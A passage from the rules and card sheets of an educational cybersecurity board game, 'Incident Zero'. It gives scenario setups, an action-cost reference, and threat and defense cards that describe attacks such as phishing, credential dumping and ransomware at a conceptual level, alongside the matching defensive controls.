Too good (gives it away): - "The attacker used Mimikatz to dump credentials from LSASS memory"

Just right (progressive disclosure): - "Your memory forensics shows suspicious LSASS process manipulation. A tool has dumped credential hashes from memory. Several cached domain admin credentials have been extracted."

Balancing Difficulty

The game is too easy if: - Teams reveal all cards in turns 1-4 with budget to spare - Clues are too specific - Teams succeed on every roll

The game is too hard if: - Teams get stuck after revealing 1 card - No successful rolls for 5+ turns - Teams hit the turn limit with only 1-2 cards revealed

Adjust by: - Number of cards (3 vs. 4 vs. 5 — the turn limit scales automatically via (chain × 2) + 1) - Quality of clues (more/less specific) - Starting budget (60 vs. 100 vs. 120) - Turn limit (formula −1 for harder, formula +1 for easier)

Running Multiple Teams

If running this for a tournament or competitive context: - Assign different attack chains to each team (or same chain for scoring comparison) - Teams cannot see each other's progress - First team to reveal all cards wins - Tiebreaker: Most Budget remaining


Sample Scenarios to Try

Scenario 1: "Startup Breach" (Beginner, 3 cards, 30 min)

  1. T-01: Phishing Campaign
  2. T-06: Mimikatz Credential Dumping
  3. T-10: SQL Database Exfiltration

Focus: Teaching full kill chain detection in 30 minutes

Scenario 2: "Nation-State Campaign" (Intermediate, 4 cards, 40 min)

  1. T-02: Watering Hole Attack
  2. T-04: Lateral Movement via SMB
  3. T-07: Scheduled Task Persistence
  4. T-09: Beaconing to C2 Server

Focus: Sophisticated attack with multiple detection points

Scenario 3: "Advanced Ransomware" (Advanced, 5 cards, 45 min)

  1. T-13: Compromised Software Vendor Update (expansion)
  2. T-04: Lateral Movement via SMB
  3. T-05: Privilege Escalation via Kernel Exploit
  4. T-09: Beaconing to C2 Server
  5. T-11: Ransomware Payload Deployment

Focus: Complex supply-chain-initiated attack chain


Extensions & Variations

Solo Play

Speed Mode

Cooperative vs. Competitive


Next Steps After This Module

If you won: - Continue to Hardening Module → Build defenses against discovered threats - Continue to Audit & Compliance Module → Verify your detection methods

If you lost: - Continue to Disaster Recovery Module → Manage the breach that succeeded - Replay with a different strategy - Try a different scenario

Standalone: Play again with a different attack chain


Quick Reference: Action Costs & Outcomes

Action Cost Roll Success Failure
Investigate 5 Budget roll + modifiers ≥ 11 1st success: clue; 2nd success on same link: reveal (v2.2) No intel (budget wasted)
Deploy Defense 10/15/25 roll + modifiers ≥ 11 Full match reveals card immediately Defense not deployed
Emergency Response 15 (v2.2) None Remove revealed threat
Modifier Effect
+2 Strong technical justification
+1 Real tool/technique referenced
+2 Deployed Defense Persistence: deployed defense's vector matches targeted link (v2.2)
Tracker Starting Changes
Budget 100 -5 per uncontained threat + -5 Active Breach Cost while any card is hidden (start of turn, v2.2); floor 0
Turn 1 +1 each turn (limit = chain × 2 + 1)
Uncontained Threats 0 +1 when revealed, -1 when contained or next card revealed

For the full list of v2.2 changes and reasoning, see the "v2.2 Playtest Edition Changes" section in Module: Incident Response.


Need Help?


Incident Response Module - Standalone Play Guide Part of Incident Zero, a modular cybersecurity board game

cards/incident-response/core-deck/threat-defense-cards.md

Incident Zero: Sample Card Sheets

Quick Reference


THREAT CARDS

Attack Chain Steps

Attack Vectors (Countermeasure Keywords)


SAMPLE THREAT CARD DECK (12 Cards)

INITIAL COMPROMISE THREATS

Card T-01: Phishing Campaign

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ PHISHING CAMPAIGN                   │
├─────────────────────────────────────┤
│ Step:    INITIAL COMPROMISE         │
│ Vector:  SOCIAL ENGINEERING         │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Your security team reports that    │
│ several employees have received     │
│ emails claiming to be from your     │
│ IT department requesting password   │
│ resets. One user has already        │
│ clicked the link. Email headers     │
│ show the domain is spoofed."        │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Phishing exploits human psychology  │
│ rather than technical vulnerabilities.│
│ Attackers use social engineering to │
│ create urgency and bypass technical │
│ controls. With email authentication │
│ (DMARC/SPF) and user training, this │
│ attack is highly preventable.       │
└─────────────────────────────────────┘

Card T-02: Watering Hole Attack

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ WATERING HOLE ATTACK                │
├─────────────────────────────────────┤
│ Step:    INITIAL COMPROMISE         │
│ Vector:  WEB EXPLOIT                │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "A popular industry blog your       │
│ employees frequently visit has      │
│ been compromised. Logs show that    │
│ your users' browsers were           │
│ redirected to a malicious domain    │
│ hosting an exploit kit targeting    │
│ unpatched browsers."                │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Watering hole attacks target        │
│ trusted third-party sites to infect │
│ specific user groups. They bypass   │
│ email filters and exploit browser   │
│ vulnerabilities. Defense requires   │
│ rapid patching and endpoint         │
│ monitoring.                         │
└─────────────────────────────────────┘

Card T-03: Compromised Credentials

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ COMPROMISED CREDENTIALS             │
├─────────────────────────────────────┤
│ Step:    INITIAL COMPROMISE         │
│ Vector:  CREDENTIAL ABUSE           │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Your SIEM has detected a           │
│ successful VPN login from an        │
│ unusual geographic location at      │
│ 3 AM. The username belongs to an    │
│ employee who is currently on        │
│ vacation. The login attempt came    │
│ from an IP in a known cybercrime    │
│ hosting provider."                  │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Credential stuffing uses passwords  │
│ leaked from third-party breaches.   │
│ If employees reuse passwords, their │
│ work accounts become compromised.   │
│ Multi-factor authentication (MFA)   │
│ is the primary defense.             │
└─────────────────────────────────────┘

PIVOT & ESCALATE THREATS

Card T-04: Lateral Movement via SMB

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ LATERAL MOVEMENT VIA SMB            │
├─────────────────────────────────────┤
│ Step:    PIVOT & ESCALATE           │
│ Vector:  NETWORK                    │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Network segmentation alerts show   │
│ unusual SMB traffic between a       │
│ compromised workstation and your    │
│ file server. Suspicious named pipe  │
│ activity detected. The attacker     │
│ appears to be enumerating shares    │
│ and attempting to access restricted │
│ resources."                         │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ SMB (Server Message Block) is a     │
│ legitimate protocol, so traffic     │
│ blends in. Flat network architecture│
│ allows attackers to move freely.    │
│ Without micro-segmentation and      │
│ strong authentication, lateral      │
│ movement is easy.                   │
└─────────────────────────────────────┘

Card T-05: Privilege Escalation via Kernel Exploit

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ PRIVILEGE ESCALATION VIA KERNEL     │
├─────────────────────────────────────┤
│ Step:    PIVOT & ESCALATE           │
│ Vector:  MALWARE                    │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "EDR telemetry shows a low-privilege│
│ process loading a proof-of-concept  │
│ exploit for an unpatched local      │
│ privilege escalation vulnerability  │
│ in the Windows kernel. Seconds      │
│ later, the same process spawned a   │
│ child running as SYSTEM. Patch      │
│ reports show this host is three     │
│ months behind on kernel updates."   │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Kernel exploits abuse memory-       │
│ corruption or logic flaws (think    │
│ Dirty Pipe or win32k CVEs) to jump  │
│ from a standard user to SYSTEM or   │
│ root. Public PoC code often appears │
│ within days of disclosure, so       │
│ unpatched hosts are easy targets.   │
│ Rapid patching, EDR behavioral      │
│ detection, and least privilege      │
│ limit the damage.                   │
└─────────────────────────────────────┘

Card T-06: Mimikatz Credential Dumping

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ MIMIKATZ CREDENTIAL DUMPING         │
├─────────────────────────────────────┤
│ Step:    PIVOT & ESCALATE           │
│ Vector:  CREDENTIAL ABUSE           │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Memory forensics analysis on the   │
│ Domain Controller reveals suspicious│
│ LSASS process manipulation. A tool  │
│ has dumped credential hashes from   │
│ memory. Several cached domain admin │
│ credentials have been extracted.    │
│ Attacker now has credentials to     │
│ move to critical systems."          │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Mimikatz attacks Windows LSASS      │
│ (Local Security Authority Subsystem)│
│ memory to extract credentials.      │
│ Without proper Credential Guard and │
│ memory protection, domain admin     │
│ credentials become compromised,     │
│ enabling full infrastructure access.│
└─────────────────────────────────────┘

PERSISTENCE THREATS

Card T-07: Scheduled Task Persistence

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ SCHEDULED TASK PERSISTENCE          │
├─────────────────────────────────────┤
│ Step:    PERSISTENCE                │
│ Vector:  MALWARE                    │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Log analysis shows a scheduled     │
│ task created by the compromised     │
│ account. The task is set to execute │
│ every 6 hours and runs a script     │
│ from a hidden directory. The        │
│ activity occurs outside normal      │
│ business hours. Timestamp metadata  │
│ indicates advanced timestomping."   │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Scheduled tasks run with privileges │
│ of the owner account and survive    │
│ reboots. They blend in with         │
│ legitimate administrative tasks.    │
│ Windows Event Logs may not be       │
│ forwarded centrally, allowing this  │
│ persistence mechanism to hide.      │
└─────────────────────────────────────┘

Card T-08: Registry Run Key Persistence

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ REGISTRY RUN KEY PERSISTENCE        │
├─────────────────────────────────────┤
│ Step:    PERSISTENCE                │
│ Vector:  MALWARE                    │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Registry analysis detects a new    │
│ entry under HKLM\Software\Microsoft\│
│ Windows\CurrentVersion\Run pointing │
│ to an executable in an unusual      │
│ location. The binary has            │
│ obfuscated metadata and a fake      │
│ digital signature. It executes at   │
│ every system startup."              │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Registry Run keys execute at startup│
│ with persistence across reboots.    │
│ They're difficult to distinguish    │
│ from legitimate startup programs.   │
│ Endpoint detection solutions must   │
│ actively monitor registry writes.   │
└─────────────────────────────────────┘

C2 & EXFIL THREATS

Card T-09: Beaconing to C2 Server

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ BEACONING TO C2 SERVER              │
├─────────────────────────────────────┤
│ Step:    C2 & EXFIL                 │
│ Vector:  NETWORK                    │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Your threat intelligence feed      │
│ alerts on suspicious outbound       │
│ HTTPS connections to a domain       │
│ associated with known malware.      │
│ Netflow shows regular 3-minute      │
│ intervals of encrypted traffic.     │
│ The pattern matches documented C2   │
│ beaconing behavior."                │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Beaconing establishes command and   │
│ control communication with the      │
│ attacker's infrastructure. Encrypted│
│ HTTPS makes payload inspection      │
│ difficult. Threat intelligence and  │
│ behavioral analysis (unusual timing)│
│ are required for detection.         │
└─────────────────────────────────────┘

Card T-10: SQL Database Exfiltration

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ SQL DATABASE EXFILTRATION           │
├─────────────────────────────────────┤
│ Step:    C2 & EXFIL                 │
│ Vector:  DATA EXFIL                 │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Database audit logs show a large   │
│ SELECT query executed by a service  │
│ account retrieving customer data.   │
│ Results (500k+ records) were piped  │
│ to a temporary file. System logs    │
│ show this file was copied to cloud  │
│ storage via encrypted connection."  │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Database exfiltration bypasses      │
│ endpoint controls. Attackers use    │
│ legitimate protocols (HTTPS, SFTP)  │
│ to trusted services (S3, Dropbox).  │
│ Without DLP (Data Loss Prevention),  │
│ and egress filtering, detection is  │
│ nearly impossible.                  │
└─────────────────────────────────────┘

Card T-11: Ransomware Payload Deployment

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ RANSOMWARE PAYLOAD DEPLOYMENT       │
├─────────────────────────────────────┤
│ Step:    C2 & EXFIL                 │
│ Vector:  MALWARE                    │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "EDR alerts spike as multiple       │
│ processes begin encrypting files    │
│ on the file server. Hundreds of     │
│ files change extension to '.locked'.│
│ A ransom note appears on all        │
│ administrative workstations. Network│
│ traffic shows exfil before encryption│
│ began (double extortion tactic)."   │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Modern ransomware exfiltrates data  │
│ first (to extort payment), then     │
│ encrypts. Fast detection during the │
│ exfil phase is critical. Once file  │
│ encryption begins, recovery becomes │
│ difficult. Segmentation and backups │
│ are essential.                      │
└─────────────────────────────────────┘

Card T-12: Browser Extension Backdoor

┌─────────────────────────────────────┐
│ THREAT CARD                         │
├─────────────────────────────────────┤
│ BROWSER EXTENSION BACKDOOR          │
├─────────────────────────────────────┤
│ Step:    C2 & EXFIL                 │
│ Vector:  DATA EXFIL                 │
├─────────────────────────────────────┤
│ CLUE FOR THREAT ORCHESTRATOR:       │
│ "Browser logs show installation of  │
│ a suspicious extension claiming to  │
│ be a productivity tool. Traffic     │
│ analysis reveals the extension is   │
│ capturing keystrokes and session    │
│ cookies. User login credentials for │
│ sensitive portals are being sent to │
│ a server in a high-risk country."   │
├─────────────────────────────────────┤
│ WHY THIS WORKS:                     │
│ Browser extensions run with full    │
│ access to user activity. They can   │
│ capture credentials, intercept      │
│ HTTPS traffic (before encryption),  │
│ and persist across browser updates. │
│ Extension vetting and endpoint      │
│ protection are critical defenses.   │
└─────────────────────────────────────┘

DEFENSE CARDS

Tier System

Countermeasure Vectors

Defense cards counter specific Attack Vectors: - SOCIAL ENGINEERING - WEB EXPLOIT - CREDENTIAL ABUSE - MALWARE - NETWORK - DATA EXFIL


SAMPLE DEFENSE CARD DECK (24 Cards)

Note (v2.2): This deck is identical to cards/hardening/core-deck/defense-cards.md (the two modules share one physical deck). Cards are grouped by tier; card IDs are stable and do not renumber when a card's tier changes, so IDs within a section are not always contiguous. D-18, D-19, D-23, and D-24 were retiered in v2.2, and D-24 is dual-tagged (counts as a match for either listed vector).

BASIC DEFENSES (10 Budget Each)

Card D-01: Email Authentication Setup

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ EMAIL AUTHENTICATION SETUP          │
│ (BASIC - 10 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: SOCIAL ENGINEERING  │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy SPF (Sender Policy           │
│ Framework), DKIM (DomainKeys        │
│ Identified Mail), and DMARC (Domain │
│ Message Authentication, Reporting & │
│ Conformance) to prevent email       │
│ spoofing. Implement enforcement     │
│ policies to reject spoofed emails.  │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Blocks phishing emails claiming to  │
│ be from your domain. Requires       │
│ attackers to find alternative       │
│ vectors. Also provides reporting on │
│ spoofing attempts.                  │
└─────────────────────────────────────┘

Card D-02: User Security Training

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ USER SECURITY TRAINING              │
│ (BASIC - 10 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: SOCIAL ENGINEERING  │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Conduct phishing awareness training │
│ for all staff. Teach recognition of │
│ suspicious links, sender spoofing,  │
│ urgency tactics, and credential     │
│ harvesting attempts. Run simulated  │
│ phishing campaigns.                 │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Reduces successful phishing rate by │
│ 70-80%. Users become your first     │
│ line of defense. Works best when    │
│ combined with technical controls.   │
└─────────────────────────────────────┘

Card D-03: Windows Update Patching

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ WINDOWS UPDATE PATCHING             │
│ (BASIC - 10 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: WEB EXPLOIT         │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy automated Windows Update     │
│ management across all systems.      │
│ Establish patch deployment timelines│
│ (critical = 48 hours, high = 2      │
│ weeks). Audit compliance with patch │
│ reporting.                          │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Closes browser and kernel           │
│ vulnerabilities. Prevents watering  │
│ hole and exploit kit attacks.       │
│ Should be combined with vulnerability│
│ scanning to identify gaps.          │
└─────────────────────────────────────┘

Card D-04: Network Firewall Rules

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ NETWORK FIREWALL RULES              │
│ (BASIC - 10 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: NETWORK             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy perimeter firewall rules to  │
│ block unauthorized outbound         │
│ protocols. Default-deny for unusual │
│ ports and known malware C2 domains. │
│ Whitelist only necessary business   │
│ traffic.                            │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Prevents early-stage lateral        │
│ movement and C2 beaconing.          │
│ Slows attacker reconnaissance.      │
│ Must be maintained with threat      │
│ intelligence feeds.                 │
└─────────────────────────────────────┘

Card D-05: Log Centralization

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ LOG CENTRALIZATION                  │
│ (BASIC - 10 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy centralized log aggregation  │
│ (syslog, Splunk, ELK). Forward      │
│ Windows Event Logs, firewall logs,  │
│ DNS queries, and proxy logs to      │
│ central SIEM. Configure syslog      │
│ integrity protection.               │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Makes local log tampering difficult.│
│ Provides investigative visibility   │
│ into attacker activities. Foundation│
│ for threat hunting and compliance.  │
└─────────────────────────────────────┘

Card D-06: Basic Antivirus Deployment

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ BASIC ANTIVIRUS DEPLOYMENT          │
│ (BASIC - 10 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy signature-based antivirus    │
│ across all endpoints. Enable        │
│ automatic definition updates        │
│ (daily). Configure real-time file   │
│ and email scanning.                 │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Catches known malware variants.     │
│ Does not detect zero-day or        │
│ polymorphic malware. Useful as part │
│ of defense-in-depth but insufficient│
│ as primary defense.                 │
└─────────────────────────────────────┘

Card D-19: Backup & Disaster Recovery

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ BACKUP & DISASTER RECOVERY          │
│ (BASIC - 10 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Implement the 3-2-1 backup          │
│ strategy: 3 copies of data, 2       │
│ different storage types, 1 offsite  │
│ copy. Test restore procedures       │
│ quarterly.                          │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Enables rapid recovery from         │
│ ransomware. Ensures data            │
│ availability even if primary        │
│ systems are compromised. Critical   │
│ for business continuity.            │
└─────────────────────────────────────┘

Card D-23: IR Program & Runbooks

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ IR PROGRAM & RUNBOOKS               │
│ (BASIC - 10 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: NETWORK             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Establish an incident response      │
│ program with detailed runbooks for  │
│ common scenarios: malware infection,│
│ data exfiltration, ransomware,      │
│ insider threats, supply chain       │
│ compromise. Include roles,          │
│ responsibilities, and communication │
│ plans.                              │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Enables faster, more coordinated    │
│ response when incidents occur.      │
│ Reduces confusion during high-      │
│ pressure situations. Improves       │
│ incident containment and recovery   │
│ time.                               │
└─────────────────────────────────────┘

ADVANCED DEFENSES (15 Budget Each)

Card D-07: Multi-Factor Authentication (MFA)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ MULTI-FACTOR AUTHENTICATION (MFA)   │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: CREDENTIAL ABUSE    │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy MFA for all remote access    │
│ (VPN, RDP), email, and admin        │
│ portals. Use authenticator apps or  │
│ hardware tokens (not SMS). Enforce  │
│ MFA on sensitive user accounts.     │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Makes compromised credentials       │
│ useless without the second factor.  │
│ Blocks credential stuffing attacks. │
│ Most effective single security      │
│ measure against account takeover.   │
└─────────────────────────────────────┘

Card D-08: EDR (Endpoint Detection & Response)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ EDR (ENDPOINT DETECTION & RESPONSE) │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy EDR agent on all endpoints.  │
│ Monitor process execution, file     │
│ creation, registry modifications,   │
│ and memory injection attempts.      │
│ Enable behavioral analytics and     │
│ automated response.                 │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Detects living-off-the-land attacks │
│ (PowerShell, cmd, scheduled tasks). │
│ Enables fast incident response and  │
│ threat hunting. Provides deep       │
│ visibility into attack progression. │
└─────────────────────────────────────┘

Card D-09: Network Segmentation

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ NETWORK SEGMENTATION                │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: NETWORK             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Implement VLANs and microsegmentation│
│ to separate user workstations from  │
│ servers. Deploy firewall rules      │
│ between segments. Implement zero-   │
│ trust network access controls.      │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Prevents lateral movement via SMB   │
│ and other internal protocols.       │
│ Limits blast radius of compromise.  │
│ Forces attackers to find alternate  │
│ paths. Combined with MFA, highly    │
│ effective.                          │
└─────────────────────────────────────┘

Card D-10: SIEM Correlation Rules

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ SIEM CORRELATION RULES              │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: NETWORK             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Create SIEM rules to detect attack  │
│ patterns: failed login spikes,      │
│ privilege escalation attempts,      │
│ unusual process creation, scheduled │
│ task creation, and data exfil       │
│ indicators.                         │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Correlates events across logs to    │
│ detect multi-step attacks. Reduces  │
│ alert fatigue through smart         │
│ aggregation. Enables faster         │
│ investigation and response.         │
└─────────────────────────────────────┘

Card D-11: Data Loss Prevention (DLP)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ DATA LOSS PREVENTION (DLP)          │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: DATA EXFIL          │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy DLP to monitor outbound data │
│ transfers. Classify sensitive data  │
│ (customer PII, source code, trade   │
│ secrets). Block or alert on         │
│ unauthorized transfers to cloud     │
│ storage, email, USB, or external    │
│ networks.                           │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Prevents SQL database exfiltration  │
│ and bulk data theft. Detects        │
│ unusual data access patterns.       │
│ Enforces data security policies.    │
│ Works best with strong authentication│
│ and encryption.                     │
└─────────────────────────────────────┘

Card D-12: Password Manager & Vault

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ PASSWORD MANAGER & VAULT            │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: CREDENTIAL ABUSE    │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy enterprise password vault    │
│ (CyberArk, HashiCorp Vault). Enforce│
│ strong unique passwords. Implement  │
│ password rotation policies for      │
│ service accounts. Enable audit      │
│ logging for credential access.      │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Prevents credential reuse attacks.  │
│ Makes credential stuffing difficult.│
│ Provides audit trail for compliance │
│ and incident investigation.         │
└─────────────────────────────────────┘

Card D-18: Intrusion Prevention System (IPS)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ INTRUSION PREVENTION SYSTEM (IPS)   │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasure: WEB EXPLOIT         │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy network-based IPS with       │
│ exploit signatures. Monitor for     │
│ known CVE exploitation patterns.    │
│ Configure WAF (Web Application      │
│ Firewall) rules for SQL injection,  │
│ XSS, and other OWASP Top 10 attacks.│
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Blocks exploitation attempts in     │
│ transit. Prevents watering hole and │
│ web exploit attacks. Most effective │
│ when combined with patching.        │
└─────────────────────────────────────┘

Card D-24: Threat Intelligence Integration

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ THREAT INTELLIGENCE INTEGRATION     │
│ (ADVANCED - 15 Budget)              │
├─────────────────────────────────────┤
│ Countermeasures: NETWORK,           │
│                  DATA EXFIL         │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Subscribe to threat intelligence    │
│ feeds (MISP, VirusTotal, AlienVault │
│ OTX). Integrate IOCs (Indicators of │
│ Compromise) into firewall, SIEM,    │
│ and proxy. Participate in           │
│ information sharing communities.    │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Enables faster detection of known   │
│ malicious IPs and domains.          │
│ Identifies emerging threats         │
│ targeting your industry. Reduces    │
│ detection time from days to minutes.│
└─────────────────────────────────────┘

ELITE DEFENSES (25 Budget Each)

Card D-13: Threat Hunting Program

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ THREAT HUNTING PROGRAM              │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Establish proactive threat hunting  │
│ using MITRE ATT&CK framework.       │
│ Hunt for living-off-the-land        │
│ techniques, anomalous processes,    │
│ suspicious registry changes, and    │
│ memory injection. Use automated     │
│ tools (OSQuery, Velociraptor).      │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Finds advanced attacks that bypass  │
│ signature-based detection. Detects  │
│ LSASS dumping, scheduled task       │
│ persistence, and registry backdoors.│
│ Reduces dwell time significantly.   │
└─────────────────────────────────────┘

Card D-14: Memory Forensics

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ MEMORY FORENSICS                    │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: MALWARE             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy memory capture and analysis  │
│ (Volatility, Memoryze). Create      │
│ memory images of suspicious systems.│
│ Analyze for credential dumping,     │
│ injected code, and rootkits. Extract│
│ evidence for incident response.     │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Detects Mimikatz attacks and        │
│ credential harvesting. Reveals      │
│ attacker activities hidden from     │
│ disk forensics. Critical for        │
│ identifying advanced persistence    │
│ mechanisms.                         │
└─────────────────────────────────────┘

Card D-15: Deception Technology (Honeypots)

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ DECEPTION TECHNOLOGY (HONEYPOTS)    │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: NETWORK             │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Deploy decoy systems (fake file     │
│ servers, databases, credentials)    │
│ to detect lateral movement. Create  │
│ canary tokens that alert when       │
│ accessed. Deploy honeypots for web  │
│ exploit detection.                  │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Any access to honeypots indicates   │
│ active compromise. Detects lateral  │
│ movement with zero false positives. │
│ Slows attacker progress and forces  │
│ reconnaissance, increasing detection│
│ time.                               │
└─────────────────────────────────────┘

Card D-16: Credential Guard & Secure Boot

┌─────────────────────────────────────┐
│ DEFENSE CARD                        │
├─────────────────────────────────────┤
│ CREDENTIAL GUARD & SECURE BOOT      │
│ (ELITE - 25 Budget)                 │
├─────────────────────────────────────┤
│ Countermeasure: CREDENTIAL ABUSE    │
├─────────────────────────────────────┤
│ DESCRIPTION:                        │
│ Enable Windows Credential Guard to  │
│ isolate LSASS in virtualized        │
│ container. Implement UEFI Secure    │
│ Boot to prevent bootkit attacks.    │
│ Enable TPM attestation for device   │
│ integrity validation.               │
├─────────────────────────────────────┤
│ EFFECT:                             │
│ Makes Mimikatz credential dumping   │
│ ineffective. Prevents bootloader    │
│ manipulation. Ensures firmware      │
│ integrity. Blocks entire classes of │
│ attacks targeting early boot stage. │
└─────────────────────────────────────┘

Card D-17: Advanced Malware Sandbox

┌─────────────────────────────────────┐
